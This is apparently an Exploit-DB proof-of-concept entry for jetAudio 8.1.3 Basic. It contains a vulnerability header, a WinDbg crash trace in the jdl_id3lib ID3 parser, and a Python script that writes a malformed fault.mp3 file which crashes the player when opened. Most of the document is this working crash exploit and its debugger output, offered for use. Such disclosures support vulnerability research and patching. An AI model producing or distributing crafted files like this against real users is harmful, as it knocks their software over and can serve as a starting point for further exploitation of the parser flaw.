jetAudio 8.1.3 Basic (mp3) – Crash (PoC)

  • 作者: Drozdova Liudmila
    日期: 2014-12-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35592/
  • # Exploit Title 	: jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
    # Product				: jetAudio Basic
    # Date	: 8.12.2014
    # Exploit Author	: ITDefensor Vulnerability Research Team http://itdefensor.ru/
    # Software Link 	: http://www.jetaudio.com/download/
    # Vulnerable version	: 8.1.3 (Latest at the moment) and probably previous versions
    # Vendor Homepage 	: http://www.jetaudio.com/
    # Tested on 	: jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
    # CVE 					: unknown at the moment
    #============================================================================================
    # Open created POC file (fault.mp3) with jetAudio
    # Details
    # 	(1e764.1df98): Access violation - code c0000005 (first chance)
    #	First chance exceptions are reported before any exception handling.
    #	This exception may be expected and handled.
    #	jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
    #	0aa6b8b9 8b4804mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
    #	0:000:x86> kb
    #	ChildEBP RetAddrArgs to Child
    #	WARNING: Stack unwind information not available. Following frames may be wrong.
    #	00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
    #============================================================================================
    #!/usr/bin/python
    
    pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
    
    mp3file = "fault.mp3"
    file = open(mp3file , "w")
    file.write(pocdata)
    file.close()